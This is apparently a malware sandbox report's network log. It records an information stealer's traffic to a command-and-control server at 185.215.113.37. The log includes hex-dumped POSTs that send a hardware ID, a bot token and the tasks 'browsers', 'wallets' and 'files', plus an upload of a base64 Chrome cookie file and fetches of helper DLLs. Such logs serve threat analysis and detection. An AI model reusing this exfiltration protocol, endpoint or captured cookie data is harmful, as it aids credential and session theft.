Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHDAKJKFCFBGCBGDHCBHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 42 38 38 45 39 42 41 30 33 41 44 32 33 32 32 36 39 35 39 30 39 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 2d 2d 0d 0a Data Ascii: ------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="hwid"AB88E9BA03AD2322695909------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="build"doma------AFHDAKJKFCFBGCBGDHCB--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKECFCFBGDHIECAAFIIDHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 34 30 38 64 39 62 33 62 37 39 61 37 62 61 63 32 32 30 63 30 36 61 63 38 64 64 30 30 63 31 30 35 65 37 65 65 37 65 38 32 62 64 63 63 63 37 62 61 39 34 64 62 31 65 32 66 33 34 38 39 38 38 30 31 62 30 61 34 32 32 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 2d 2d 0d 0a Data Ascii: ------JKECFCFBGDHIECAAFIIDContent-Disposition: form-data; name="token"e408d9b3b79a7bac220c06ac8dd00c105e7ee7e82bdccc7ba94db1e2f34898801b0a422a------JKECFCFBGDHIECAAFIIDContent-Disposition: form-data; name="message"browsers------JKECFCFBGDHIECAAFIID--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHCBAFIDAECBGCBFHJEHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 48 43 42 41 46 49 44 41 45 43 42 47 43 42 46 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 34 30 38 64 39 62 33 62 37 39 61 37 62 61 63 32 32 30 63 30 36 61 63 38 64 64 30 30 63 31 30 35 65 37 65 65 37 65 38 32 62 64 63 63 63 37 62 61 39 34 64 62 31 65 32 66 33 34 38 39 38 38 30 31 62 30 61 34 32 32 61 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 43 42 41 46 49 44 41 45 43 42 47 43 42 46 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 43 42 41 46 49 44 41 45 43 42 47 43 42 46 48 4a 45 2d 2d 0d 0a Data Ascii: ------IEHCBAFIDAECBGCBFHJEContent-Disposition: form-data; name="token"e408d9b3b79a7bac220c06ac8dd00c105e7ee7e82bdccc7ba94db1e2f34898801b0a422a------IEHCBAFIDAECBGCBFHJEContent-Disposition: form-data; name="message"plugins------IEHCBAFIDAECBGCBFHJE--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCBAKJEHDBGHIEBGCGDGHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 42 41 4b 4a 45 48 44 42 47 48 49 45 42 47 43 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 34 30 38 64 39 62 33 62 37 39 61 37 62 61 63 32 32 30 63 30 36 61 63 38 64 64 30 30 63 31 30 35 65 37 65 65 37 65 38 32 62 64 63 63 63 37 62 61 39 34 64 62 31 65 32 66 33 34 38 39 38 38 30 31 62 30 61 34 32 32 61 0d 0a 2d 2d 2d 2d 2d 2d 48 43 42 41 4b 4a 45 48 44 42 47 48 49 45 42 47 43 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 48 43 42 41 4b 4a 45 48 44 42 47 48 49 45 42 47 43 47 44 47 2d 2d 0d 0a Data Ascii: ------HCBAKJEHDBGHIEBGCGDGContent-Disposition: form-data; name="token"e408d9b3b79a7bac220c06ac8dd00c105e7ee7e82bdccc7ba94db1e2f34898801b0a422a------HCBAKJEHDBGHIEBGCGDGContent-Disposition: form-data; name="message"fplugins------HCBAKJEHDBGHIEBGCGDG--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIIEBGCBGIDHDGCAKJEBHost: 185.215.113.37Content-Length: 6371Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHDAKJKFCFBGCBGDHCBHost: 185.215.113.37Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 34 30 38 64 39 62 33 62 37 39 61 37 62 61 63 32 32 30 63 30 36 61 63 38 64 64 30 30 63 31 30 35 65 37 65 65 37 65 38 32 62 64 63 63 63 37 62 61 39 34 64 62 31 65 32 66 33 34 38 39 38 38 30 31 62 30 61 34 32 32 61 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 77 4f 44 41 79 43 55 35 4a 52 41 6b 31 4d 54 45 39 56 55 4a 6c 54 6b 4e 72 57 6a 4e 4d 4f 48 6c 59 59 33 67 34 63 57 67 30 53 6b 5a 56 57 47 74 33 61 30 35 44 4f 55 6c 79 5a 47 6c 53 5a 47 4a 71 55 31 52 71 63 56 4e 70 52 6d 67 34 56 33 4a 53 59 32 4a 4c 63 6c 39 79 54 30 70 69 5a 30 68 5a 4e 6c 52 42 4e 46 4a 55 4c 54 5a 77 63 7a 42 69 61 47 56 74 5a 6e 64 44 55 45 4a 7a 54 45 31 6e 55 46 51 33 4c 57 64 55 59 31 64 78 53 48 5a 61 64 6c 70 69 59 57 5a 50 63 47 74 78 55 6e 6b 77 5a 45 78 35 57 55 63 35 51 57 70 51 4d 6e 5a 69 56 55 4a 76 62 57 46 79 62 6d 4d 35 63 47 4e 61 56 6d 78 6f 53 47 74 56 5a 56 56 68 56 30 31 31 63 6b 51 77 52 30 64 59 65 56 63 77 4e 56 39 43 58 7a 46 4a 65 56 56 4f 57 55 56 46 54 47 31 35 63 56 4a 6e 43 69 35 6e 62 32 39 6e 62 47 55 75 59 32 39 74 43 56 52 53 56 55 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 6a 6b 35 4d 44 63 78 4e 6a 51 77 43 54 46 51 58 30 70 42 55 67 6b 79 4d 44 49 7a 4c 54 45 77 4c 54 41 31 4c 54 41 32 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 2d 2d 0d 0a Data Ascii: ------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="token"e408d9b3b79a7bac220c06ac8dd00c105e7ee7e82bdccc7ba94db1e2f34898801b0a422a------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjkwODAyCU5JRAk1MTE9VUJlTkNrWjNMOHlYY3g4cWg0SkZVWGt3a05DOUlyZGlSZGJqU1RqcVNpRmg4V3JSY2JLcl9yT0piZ0hZNlRBNFJULTZwczBiaGVtZndDUEJzTE1nU
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAAFBAKECAEGCBFIEGDGHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 34 30 38 64 39 62 33 62 37 39 61 37 62 61 63 32 32 30 63 30 36 61 63 38 64 64 30 30 63 31 30 35 65 37 65 65 37 65 38 32 62 64 63 63 63 37 62 61 39 34 64 62 31 65 32 66 33 34 38 39 38 38 30 31 62 30 61 34 32 32 61 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 2d 2d 0d 0a Data Ascii: ------DAAFBAKECAEGCBFIEGDGContent-Disposition: form-data; name="token"e408d9b3b79a7bac220c06ac8dd00c105e7ee7e82bdccc7ba94db1e2f34898801b0a422a------DAAFBAKECAEGCBFIEGDGContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------DAAFBAKECAEGCBFIEGDGContent-Disposition: form-data; name="file"------DAAFBAKECAEGCBFIEGDG--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFIIEHJDBKJKECBFHDGHHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 34 30 38 64 39 62 33 62 37 39 61 37 62 61 63 32 32 30 63 30 36 61 63 38 64 64 30 30 63 31 30 35 65 37 65 65 37 65 38 32 62 64 63 63 63 37 62 61 39 34 64 62 31 65 32 66 33 34 38 39 38 38 30 31 62 30 61 34 32 32 61 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 2d 2d 0d 0a Data Ascii: ------BFIIEHJDBKJKECBFHDGHContent-Disposition: form-data; name="token"e408d9b3b79a7bac220c06ac8dd00c105e7ee7e82bdccc7ba94db1e2f34898801b0a422a------BFIIEHJDBKJKECBFHDGHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------BFIIEHJDBKJKECBFHDGHContent-Disposition: form-data; name="file"------BFIIEHJDBKJKECBFHDGH--
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/freebl3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/mozglue.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/msvcp140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/softokn3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHDAKJKFCFBGCBGDHCBHost: 185.215.113.37Content-Length: 947Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKKJEHCGCGDAAAKFHJKJHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4b 4a 45 48 43 47 43 47 44 41 41 41 4b 46 48 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 34 30 38 64 39 62 33 62 37 39 61 37 62 61 63 32 32 30 63 30 36 61 63 38 64 64 30 30 63 31 30 35 65 37 65 65 37 65 38 32 62 64 63 63 63 37 62 61 39 34 64 62 31 65 32 66 33 34 38 39 38 38 30 31 62 30 61 34 32 32 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 4a 45 48 43 47 43 47 44 41 41 41 4b 46 48 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 4a 45 48 43 47 43 47 44 41 41 41 4b 46 48 4a 4b 4a 2d 2d 0d 0a Data Ascii: ------KKKJEHCGCGDAAAKFHJKJContent-Disposition: form-data; name="token"e408d9b3b79a7bac220c06ac8dd00c105e7ee7e82bdccc7ba94db1e2f34898801b0a422a------KKKJEHCGCGDAAAKFHJKJContent-Disposition: form-data; name="message"wallets------KKKJEHCGCGDAAAKFHJKJ--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFHJJJKKFHIDAAKFBFBFHost: 185.215.113.37Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 34 30 38 64 39 62 33 62 37 39 61 37 62 61 63 32 32 30 63 30 36 61 63 38 64 64 30 30 63 31 30 35 65 37 65 65 37 65 38 32 62 64 63 63 63 37 62 61 39 34 64 62 31 65 32 66 33 34 38 39 38 38 30 31 62 30 61 34 32 32 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 2d 2d 0d 0a Data Ascii: ------KFHJJJKKFHIDAAKFBFBFContent-Disposition: form-data; name="token"e408d9b3b79a7bac220c06ac8dd00c105e7ee7e82bdccc7ba94db1e2f34898801b0a422a------KFHJJJKKFHIDAAKFBFBFContent-Disposition: form-data; name="message"files------KFHJJJKKFHIDAAKFBFBF--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGIDGCGIEGDGDGDGHJKKHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 49 44 47 43 47 49 45 47 44 47 44 47 44 47 48 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 34 30 38 64 39 62 33 62 37 39 61 37 62 61 63 32 32 30 63 30 36 61 63 38 64 64 30 30 63 31 30 35 65 37 65 65 37 65 38 32 62 64 63 63 63 37 62 61 39 34 64 62 31 65 32 66 33 34 38 39 38 38 30 31 62 30 61 34 32 32 61 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 44 47 43 47 49 45 47 44 47 44 47 44 47 48 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 44 47 43 47 49 45 47 44 47 44 47 44 47 48 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 44 47 43 47 49 45 47 44 47 44 47 44 47 48 4a 4b 4b 2d 2d 0d 0a Data Ascii: ------CGIDGCGIEGDGDGDGHJKKContent-Disposition: form-data; name="token"e408d9b3b79a7bac220c06ac8dd00c105e7ee7e82bdccc7ba94db1e2f34898801b0a422a------CGIDGCGIEGDGDGDGHJKKContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------CGIDGCGIEGDGDGDGHJKKContent-Disposition: form-data; name="file"------CGIDGCGIEGDGDGDGHJKK--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEHIDAKECFIEBGDHJEBKHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 34 30 38 64 39 62 33 62 37 39 61 37 62 61 63 32 32 30 63 30 36 61 63 38 64 64 30 30 63 31 30 35 65 37 65 65 37 65 38 32 62 64 63 63 63 37 62 61 39 34 64 62 31 65 32 66 33 34 38 39 38 38 30 31 62 30 61 34 32 32 61 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 2d 2d 0d 0a Data Ascii: ------AEHIDAKECFIEBGDHJEBKContent-Disposition: form-data; name="token"e408d9b3b79a7bac220c06ac8dd00c105e7ee7e82bdccc7ba94db1e2f34898801b0a422a------AEHIDAKECFIEBGDHJEBKContent-Disposition: form-data; name="message"ybncbhylepme------AEHIDAKECFIEBGDHJEBK--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFIDGDBGCAAFIDHIJKEHHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 49 4a 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 34 30 38 64 39 62 33 62 37 39 61 37 62 61 63 32 32 30 63 30 36 61 63 38 64 64 30 30 63 31 30 35 65 37 65 65 37 65 38 32 62 64 63 63 63 37 62 61 39 34 64 62 31 65 32 66 33 34 38 39 38 38 30 31 62 30 61 34 32 32 61 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 49 4a 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 49 4a 4b 45 48 2d 2d 0d 0a Data Ascii: ------AFIDGDBGCAAFIDHIJKEHContent-Disposition: form-data; name="token"e408d9b3b79a7bac220c06ac8dd00c105e7ee7e82bdccc7ba94db1e2f34898801b0a422a------AFIDGDBGCAAFIDHIJKEHContent-Disposition: form-data; name="message"wkkjqaiaxkhb------AFIDGDBGCAAFIDHIJKEH--

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
